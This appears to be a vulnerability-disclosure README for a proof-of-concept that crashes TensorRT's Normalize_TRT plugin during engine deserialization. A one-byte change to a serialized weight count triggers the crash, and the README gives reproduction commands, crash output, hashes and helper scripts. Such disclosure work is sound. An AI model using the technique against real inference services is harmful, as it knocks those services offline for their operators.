
TensorRT Normalize_TRT Deserialization DoS PoC

This repository contains a TensorRT .engine proof-of-concept for a model file deserialization crash in the built-in Normalize_TRT plugin.

The malformed engine differs from the valid control engine by one byte: the serialized Normalize_TRT mWeights.count field is changed from 1 to 2. When standard TensorRT plugins are registered and the malformed engine is loaded, TensorRT reaches Normalize::Normalize(void const* buffer, size_t length), logs a failed length validation at normalizePlugin.cpp:80, and then the process exits with SIGSEGV.
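The single-byte difference can be confirmed with a short byte-level diff of the two engine files. This is a minimal stdlib sketch (the file names match this repository's layout; the exact offset of the mutated byte is not asserted here):

```python
def byte_diff(path_a: str, path_b: str) -> list[tuple[int, int, int]]:
    """Return (offset, byte_a, byte_b) for every position where the files differ."""
    with open(path_a, "rb") as fa, open(path_b, "rb") as fb:
        a, b = fa.read(), fb.read()
    assert len(a) == len(b), "engines differ in length"
    return [(i, x, y) for i, (x, y) in enumerate(zip(a, b)) if x != y]

# Usage in this repository's checkout (expect exactly one entry,
# the serialized mWeights.count byte changed from 1 to 2):
#   for off, v, m in byte_diff("normalize_valid_control.engine",
#                              "normalize_malformed_count.engine"):
#       print(f"offset=0x{off:x} valid=0x{v:02x} malformed=0x{m:02x}")
```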

Files

  • normalize_malformed_count.engine: malformed PoC engine.
  • normalize_valid_control.engine: valid control engine built from the same network.
  • reproduce.py: minimal loader that initializes standard TensorRT plugins and deserializes the engine.
  • requirements.txt: pinned Python package versions used during local validation.

Reproduction

Tested with TensorRT 10.16.1.11.

python3 -m venv venv
./venv/bin/python -m pip install -r requirements.txt
./venv/bin/python reproduce.py normalize_valid_control.engine
./venv/bin/python reproduce.py normalize_malformed_count.engine

Expected behavior:

$ ./venv/bin/python reproduce.py normalize_valid_control.engine
engine_host_code_allowed=False
loaded=True

$ ./venv/bin/python reproduce.py normalize_malformed_count.engine
engine_host_code_allowed=False
[TRT] [F] Validation failed: d == a + length
/_src/plugin/normalizePlugin/normalizePlugin.cpp:80
[TRT] [E] std::exception
Segmentation fault
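Because the crash kills the Python process, it cannot be caught in-process; one way to classify the outcome is to run reproduce.py in a subprocess and inspect the return code. This is a sketch (on POSIX, a negative return code -N means the child died from signal N):

```python
import signal
import subprocess
import sys

def classify_run(*args: str) -> str:
    """Run a command and report whether it exited cleanly or died on SIGSEGV."""
    proc = subprocess.run(list(args), capture_output=True, text=True)
    if proc.returncode == -signal.SIGSEGV:
        return "SIGSEGV"        # crash reproduced
    if proc.returncode == 0:
        return "clean-exit"     # loaded, or failed gracefully with loaded=False
    return f"exit={proc.returncode}"

# Usage against this repo's PoC (assumes the venv created in the steps above):
#   classify_run("./venv/bin/python", "reproduce.py",
#                "normalize_malformed_count.engine")
```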

The crash requires the standard TensorRT plugin registry to be initialized. Without plugin initialization, TensorRT fails cleanly because it cannot find Normalize_TRT:

./venv/bin/python reproduce.py --no-init-plugins normalize_malformed_count.engine

Expected clean failure:

engine_host_code_allowed=False
[TRT] [E] ... Cannot find plugin: Normalize_TRT, version: 1 ...
loaded=False

Hashes

82157f8a49985e3cd942381c54bdc1dd05b8d369bbb2faef6fd0f619c5b31e97  normalize_valid_control.engine
0c528c8f9f3a471ffb47208499f4b00ebc5cbc17f72667785726e89135cb4694  normalize_malformed_count.engine
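The hashes above can be verified with a few lines of stdlib Python (a sketch; `sha256sum` works equally well):

```python
import hashlib

def sha256_of(path: str) -> str:
    """Hex SHA-256 digest of a file, streamed in 64 KiB chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

# Usage in this repository's checkout:
#   assert sha256_of("normalize_valid_control.engine") == \
#       "82157f8a49985e3cd942381c54bdc1dd05b8d369bbb2faef6fd0f619c5b31e97"
```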

Scope

This PoC demonstrates reliable denial of service during TensorRT engine deserialization. It does not demonstrate arbitrary code execution.
